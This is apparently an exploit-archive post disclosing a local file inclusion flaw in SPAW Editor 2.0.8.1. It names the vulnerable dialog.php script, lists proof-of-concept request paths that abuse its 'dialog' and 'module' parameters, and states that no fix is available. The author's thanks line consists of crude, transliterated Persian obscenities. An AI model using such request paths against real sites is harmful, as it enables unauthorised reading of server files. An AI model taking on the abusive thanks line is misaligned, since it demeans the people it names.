Spawn Editor 2.0.8.1 Local File Inclusion Vulnerability

2010-10-05 15:15:10

# Exploit Title: local file include
# Date:
# Author: soorakh kos

# Software Link: http://sourceforge.net/projects/spaw/files/spaw-php/SPAW%20PHP%20v.2.0.8.1/spaw-php-2081-gpl.zip/download

# Version: SPAW Editor v.2

# Thanks: kose roya , kose soosan , kose amam,kose dokhtar amam ,and all jaghi iranian boys
-----------


vul code: /path/dialogs/dialog.php

------------------------------------------------

poc:
/path/dialogs/dialog.php?dialog=lfi
/path/dialogs/dialog.php?module=lfi

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.